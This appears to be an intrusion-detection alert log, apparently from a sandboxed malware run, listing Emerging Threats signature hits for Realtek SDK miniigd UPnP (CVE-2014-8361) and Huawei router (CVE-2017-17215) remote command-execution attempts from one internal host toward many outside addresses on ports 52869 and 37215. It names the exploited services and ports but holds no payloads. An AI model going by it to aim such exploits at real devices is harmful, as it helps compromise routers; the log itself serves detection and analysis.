                                      07/20/24-23:01:13.589327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4351652869192.168.2.2351.20.137.216
                                      07/20/24-23:01:08.638879TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25180052869192.168.2.2346.176.142.26
                                      07/20/24-23:01:21.954501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321237215192.168.2.23157.226.178.202
                                      07/20/24-23:01:31.327540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25701452869192.168.2.23179.142.123.85
                                      07/20/24-23:01:49.721561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3927252869192.168.2.23208.98.159.35
                                      07/20/24-23:01:52.878047TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24321252869192.168.2.23189.225.243.103
                                      07/20/24-23:01:42.530468TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25978652869192.168.2.23221.195.248.226
                                      07/20/24-23:00:59.148144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749037215192.168.2.23157.211.128.165
                                      07/20/24-23:01:27.651332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990037215192.168.2.23206.228.241.87
                                      07/20/24-23:01:27.660099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231637215192.168.2.23209.25.89.22
                                      07/20/24-23:01:04.053605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884637215192.168.2.23157.57.185.177
                                      07/20/24-23:01:46.525128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4582052869192.168.2.2382.187.47.45
                                      07/20/24-23:01:58.755147TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25127852869192.168.2.23131.14.182.74
                                      07/20/24-23:01:12.807102TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5464852869192.168.2.2357.137.225.59
                                      07/20/24-23:01:52.992845TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614895852869192.168.2.2376.71.172.39
                                      07/20/24-23:01:50.955471TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614623252869192.168.2.23206.46.247.134
                                      07/20/24-23:01:08.619597TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24058452869192.168.2.23207.112.16.238
                                      07/20/24-23:01:40.334934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153437215192.168.2.23197.177.151.139
                                      07/20/24-23:01:49.553791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3348452869192.168.2.2324.80.173.172
                                      07/20/24-23:01:02.059312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434237215192.168.2.23197.72.210.161
                                      07/20/24-23:01:45.179680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615981452869192.168.2.23133.159.36.252
                                      07/20/24-23:01:44.837054TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615628252869192.168.2.23155.161.7.211
                                      07/20/24-23:02:04.208558TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25519252869192.168.2.23113.102.84.222
                                      07/20/24-23:01:00.648489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699637215192.168.2.2341.39.168.222
                                      07/20/24-23:02:12.082957TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613320052869192.168.2.2367.40.156.6
                                      07/20/24-23:01:08.572556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3373852869192.168.2.2375.207.187.133
                                      07/20/24-23:01:08.700029TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24464452869192.168.2.23174.56.72.194
                                      07/20/24-23:01:42.479337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4342052869192.168.2.23204.114.85.200
                                      07/20/24-23:01:42.928503TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613599052869192.168.2.23202.8.238.183
                                      07/20/24-23:01:55.572517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337852869192.168.2.2314.190.237.146
                                      07/20/24-23:01:00.639011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038437215192.168.2.2341.203.224.247
                                      07/20/24-23:01:52.609463TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25776252869192.168.2.23173.172.122.41
                                      07/20/24-23:01:10.406934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570637215192.168.2.23143.197.81.99
                                      07/20/24-23:01:11.818842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505237215192.168.2.2341.84.101.199
                                      07/20/24-23:01:27.729822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749437215192.168.2.23157.212.32.19
                                      07/20/24-23:00:57.221583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445837215192.168.2.23157.170.128.9
                                      07/20/24-23:01:34.044717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5161437215192.168.2.23171.231.69.230
                                      07/20/24-23:01:48.016319TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24161452869192.168.2.23101.157.175.20
                                      07/20/24-23:01:08.639622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5732052869192.168.2.2325.0.169.170
                                      07/20/24-23:01:45.625081TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615966652869192.168.2.2373.50.29.53
                                      07/20/24-23:01:02.117244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3579852869192.168.2.23207.30.132.8
                                      07/20/24-23:01:44.520226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615230852869192.168.2.23108.210.234.252
                                      07/20/24-23:01:03.199235TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614952852869192.168.2.2346.176.142.26
                                      07/20/24-23:01:24.889164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716437215192.168.2.23197.79.73.48
                                      07/20/24-23:01:08.572790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4915052869192.168.2.2313.18.63.141
                                      07/20/24-23:00:59.163619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501237215192.168.2.23157.20.27.216
                                      07/20/24-23:01:43.206220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614640452869192.168.2.23208.81.102.220
                                      07/20/24-23:01:53.484243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4860252869192.168.2.23171.210.140.181
                                      07/20/24-23:01:04.430069TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5936052869192.168.2.23117.76.49.30
                                      07/20/24-23:01:42.799973TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614159852869192.168.2.2332.163.145.253
                                      07/20/24-23:01:44.052569TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613407452869192.168.2.2331.0.108.140
                                      07/20/24-23:01:40.301143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301837215192.168.2.23157.199.208.242
                                      07/20/24-23:01:41.258056TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614468252869192.168.2.23152.44.195.237
                                      07/20/24-23:01:45.887574TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615300052869192.168.2.2397.241.192.98
                                      07/20/24-23:01:52.883801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5511252869192.168.2.23128.145.135.61
                                      07/20/24-23:01:57.560388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5031452869192.168.2.2367.31.108.66
                                      07/20/24-23:01:31.325694TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24053652869192.168.2.2324.238.134.176
                                      07/20/24-23:01:45.967403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4611052869192.168.2.238.220.8.58
                                      07/20/24-23:01:41.604763TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25834652869192.168.2.23122.124.32.89
                                      07/20/24-23:01:42.033190TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24864252869192.168.2.23164.216.180.24
                                      07/20/24-23:01:31.326982TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26050052869192.168.2.2370.211.204.245
                                      07/20/24-23:01:31.999991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4310437215192.168.2.23197.255.148.186
                                      07/20/24-23:01:08.607816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3327652869192.168.2.2334.184.40.220
                                      07/20/24-23:01:26.023836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4399252869192.168.2.2336.230.221.168
                                      07/20/24-23:01:52.006905TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3819452869192.168.2.2347.192.243.189
                                      07/20/24-23:01:02.127340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759437215192.168.2.23197.25.159.41
                                      07/20/24-23:01:07.054782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4514437215192.168.2.2341.77.106.70
                                      07/20/24-23:01:11.631549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721437215192.168.2.23167.255.64.127
                                      07/20/24-23:01:31.327808TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24625052869192.168.2.2349.81.102.7
                                      07/20/24-23:01:52.826575TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4254652869192.168.2.239.230.247.23
                                      07/20/24-23:01:43.123752TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3799852869192.168.2.23200.2.226.98
                                      07/20/24-23:01:46.150064TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23488052869192.168.2.2342.202.134.116
                                      07/20/24-23:01:46.556921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5091852869192.168.2.2327.31.121.159
                                      07/20/24-23:01:24.732773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5308052869192.168.2.2323.131.141.174
                                      07/20/24-23:01:44.881853TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4134452869192.168.2.23223.51.209.65
                                      07/20/24-23:01:45.713934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23761052869192.168.2.2390.150.161.105
                                      07/20/24-23:01:43.260197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4251452869192.168.2.2364.107.44.177
                                      07/20/24-23:01:06.989167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5303237215192.168.2.23197.116.102.178
                                      07/20/24-23:01:41.722890TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3854852869192.168.2.2335.242.111.156
                                      07/20/24-23:00:57.222009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3651237215192.168.2.23157.21.67.49
                                      07/20/24-23:02:03.068984TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5255252869192.168.2.2348.103.95.129
                                      07/20/24-23:01:42.719940TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23778852869192.168.2.23132.116.164.169
                                      07/20/24-23:01:42.854322TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614629252869192.168.2.23132.102.241.51
                                      07/20/24-23:01:50.176893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614198052869192.168.2.2367.179.229.220
                                      07/20/24-23:01:31.976649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018037215192.168.2.23157.190.18.125
                                      07/20/24-23:01:46.143923TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614431652869192.168.2.2364.151.112.79
                                      07/20/24-23:02:14.686790TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613548452869192.168.2.2392.131.8.148
                                      07/20/24-23:01:42.786028TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25651852869192.168.2.23200.107.251.119
                                      07/20/24-23:01:24.867858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216037215192.168.2.23197.19.178.39
                                      07/20/24-23:01:49.277117TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5884652869192.168.2.23216.9.135.122
                                      07/20/24-23:01:04.595913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5227652869192.168.2.2391.233.41.28
                                      07/20/24-23:02:53.715694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3308052869192.168.2.23209.124.7.215
                                      07/20/24-23:01:50.901722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288652869192.168.2.23141.38.115.93
                                      07/20/24-23:01:06.990165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463437215192.168.2.23197.78.251.102
                                      07/20/24-23:01:47.248064TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615112652869192.168.2.23182.240.112.154
                                      07/20/24-23:01:43.965873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5153452869192.168.2.23202.170.123.220
                                      07/20/24-23:02:35.459810TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3468652869192.168.2.23173.18.107.141
                                      07/20/24-23:01:47.047497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3283452869192.168.2.23112.206.146.120
                                      07/20/24-23:01:50.418920TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615640052869192.168.2.2379.45.122.255
                                      07/20/24-23:01:34.044223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013837215192.168.2.2341.19.208.214
                                      07/20/24-23:01:08.679677TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25698852869192.168.2.23105.183.167.212
                                      07/20/24-23:01:42.580745TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4254252869192.168.2.231.216.69.165
                                      07/20/24-23:01:02.140869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5954252869192.168.2.2375.207.187.133
                                      07/20/24-23:01:13.972649TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4740052869192.168.2.23113.195.103.231
                                      07/20/24-23:01:42.709583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4860652869192.168.2.23155.110.172.241
                                      07/20/24-23:02:21.004725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5833652869192.168.2.23102.251.132.142
                                      07/20/24-23:01:34.045143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4778837215192.168.2.2341.244.254.171
                                      07/20/24-23:01:34.053061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691037215192.168.2.23134.205.144.234
                                      07/20/24-23:01:53.199976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614827852869192.168.2.2389.25.147.2
                                      07/20/24-23:02:21.004725TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25650852869192.168.2.23125.106.198.203
                                      07/20/24-23:01:34.046616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077637215192.168.2.23102.164.167.66
                                      07/20/24-23:01:41.637960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5536052869192.168.2.2380.104.187.148
                                      07/20/24-23:01:40.285038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3820637215192.168.2.23158.207.166.74
                                      07/20/24-23:01:55.366575TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23373052869192.168.2.23112.243.101.70
                                      07/20/24-23:01:43.173843TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614837652869192.168.2.2364.190.167.168
                                      07/20/24-23:01:44.670285TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25561052869192.168.2.23111.85.168.68
                                      07/20/24-23:01:41.286911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3338852869192.168.2.23100.224.33.210
                                      07/20/24-23:01:42.612377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6000452869192.168.2.2385.78.48.17
                                      07/20/24-23:02:02.671155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4999452869192.168.2.2358.121.119.159
                                      07/20/24-23:01:42.869520TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615891052869192.168.2.23160.195.41.193
                                      07/20/24-23:01:43.260197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4546452869192.168.2.23146.167.250.116
                                      07/20/24-23:01:20.150638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618837215192.168.2.23114.205.87.78
                                      07/20/24-23:02:00.413915TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23833452869192.168.2.2348.17.76.254
                                      07/20/24-23:01:53.353271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5945252869192.168.2.23179.153.61.251
                                      07/20/24-23:01:51.288562TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3835052869192.168.2.2320.232.50.163
                                      07/20/24-23:01:40.321300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071437215192.168.2.23157.183.64.132
                                      07/20/24-23:01:03.072080TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615666452869192.168.2.23107.75.193.125
                                      07/20/24-23:01:45.063335TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25114052869192.168.2.2347.135.155.164
                                      07/20/24-23:01:42.869521TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25682852869192.168.2.2342.7.66.220
                                      07/20/24-23:01:41.360712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3741052869192.168.2.2347.35.34.220
                                      07/20/24-23:01:20.175900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3612237215192.168.2.23197.188.204.57
                                      07/20/24-23:01:45.075399TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3596252869192.168.2.23162.100.122.131
                                      07/20/24-23:01:59.092655TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615328252869192.168.2.2374.245.76.95
                                      07/20/24-23:01:44.082683TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4989252869192.168.2.2379.95.218.159
                                      07/20/24-23:01:45.078337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4064652869192.168.2.2375.147.225.215
                                      07/20/24-23:01:48.181097TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23449052869192.168.2.23137.66.212.197
                                      07/20/24-23:01:08.584506TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5790252869192.168.2.23143.198.233.204
                                      07/20/24-23:01:25.535708TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4151452869192.168.2.23151.115.197.13
                                      07/20/24-23:01:40.290003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401037215192.168.2.23220.248.218.41
                                      07/20/24-23:01:31.975158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882237215192.168.2.23181.88.221.210
                                      07/20/24-23:01:31.976984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700237215192.168.2.2341.222.246.61
                                      07/20/24-23:00:59.157444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5263237215192.168.2.23197.12.37.150
                                      07/20/24-23:01:11.636599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927037215192.168.2.2313.40.75.19
                                      07/20/24-23:01:42.470759TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24451652869192.168.2.23192.12.11.101
                                      07/20/24-23:01:43.970621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5101052869192.168.2.23173.1.18.208
                                      07/20/24-23:01:48.701127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615211252869192.168.2.23174.95.107.188
                                      07/20/24-23:01:20.096752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866037215192.168.2.23197.114.190.173
                                      07/20/24-23:01:42.159489TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615224052869192.168.2.2343.168.154.99
                                      07/20/24-23:01:24.876750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4566637215192.168.2.23157.217.202.87
                                      07/20/24-23:01:24.990022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5646452869192.168.2.2385.173.195.222
                                      07/20/24-23:01:47.872561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4532852869192.168.2.2384.198.11.250
                                      07/20/24-23:01:53.665550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6037852869192.168.2.23153.51.4.30
                                      07/20/24-23:01:43.392835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3638452869192.168.2.23202.8.238.183
                                      07/20/24-23:01:44.971718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5257452869192.168.2.23210.173.156.193
                                      07/20/24-23:01:43.946379TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614632852869192.168.2.23151.244.29.112
                                      07/20/24-23:02:10.031806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4307652869192.168.2.2364.169.37.205
                                      07/20/24-23:01:34.043880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906437215192.168.2.2341.5.220.159
                                      07/20/24-23:01:24.944299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662637215192.168.2.23157.132.44.64
                                      07/20/24-23:01:49.011895TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614395052869192.168.2.2359.76.186.58
                                      07/20/24-23:01:24.904906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995637215192.168.2.23197.71.217.61
                                      07/20/24-23:01:47.962852TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3488652869192.168.2.23191.208.197.76
                                      07/20/24-23:01:50.038268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5156852869192.168.2.23166.125.46.208
                                      07/20/24-23:02:06.553447TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4881452869192.168.2.2358.121.119.159
                                      07/20/24-23:01:42.632446TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25381052869192.168.2.23189.193.210.39
                                      07/20/24-23:01:46.293475TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614805052869192.168.2.2337.140.130.170
                                      07/20/24-23:02:43.072508TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614314652869192.168.2.2344.124.10.6
                                      07/20/24-23:01:44.139692TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615825052869192.168.2.23157.142.102.71
                                      07/20/24-23:01:41.303455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4229252869192.168.2.23182.86.228.100
                                      07/20/24-23:01:27.660100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4095437215192.168.2.23171.152.33.197
                                      07/20/24-23:01:47.995637TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5877452869192.168.2.2359.121.190.157
                                      07/20/24-23:02:09.627181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4919652869192.168.2.23164.143.82.53
                                      07/20/24-23:01:34.050672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953237215192.168.2.2341.141.197.116
                                      07/20/24-23:01:57.101402TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613472252869192.168.2.23117.106.84.138
                                      07/20/24-23:02:00.512136TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25935252869192.168.2.23120.165.99.108
                                      07/20/24-23:01:52.947418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4436052869192.168.2.23173.232.109.220
                                      07/20/24-23:01:43.841155TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24791052869192.168.2.23133.172.125.251
                                      07/20/24-23:00:59.185032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574837215192.168.2.23197.112.222.157
